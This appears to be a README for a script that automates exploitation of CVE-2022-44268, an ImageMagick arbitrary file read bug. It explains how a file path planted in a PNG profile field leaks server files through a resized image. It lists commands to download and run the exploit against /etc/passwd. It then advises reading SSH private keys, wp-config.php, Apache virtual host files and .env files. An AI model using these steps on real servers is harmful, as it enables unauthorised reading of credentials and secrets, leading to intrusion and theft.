Automating exploitation of CVE-2022-44268 ImageMagick Arbitrary File Read
Original finding: https://www.metabaseq.com/imagemagick-zero-days/
PoC Repository: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick will interpret the "profile" text string** as a filename** and will load the content as a raw profile, then the attacker can download the resized image which will come with the content of a remote file.
🔴 Take a PNG file, add a file path to the "profile" EXIF field, send it to a website using an affected version of ImageMagick, it interprets the file path, load its content into the EXIF field, you download the image, extract the HEX data in the "Raw Profile Type" field, and convert it to ASCII to read the remote file.
Affected versions: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -ywget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
demo_auto-cve-2022-44268.mp4
Once you get users from /etc/passwd, try to enumerate SSH private keys from /home/.ssh// :
- id_rsa
- id_ecdsa
- id_ed25519 e.g /home/john/.ssh/id_ed25519
Don't forget :
- config files for known CMS like wp-config.php for Wordpress
- Virtual Hosts enumeration like /etc/apache2/sites-available/000-default.conf,
- or .env files for instances
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268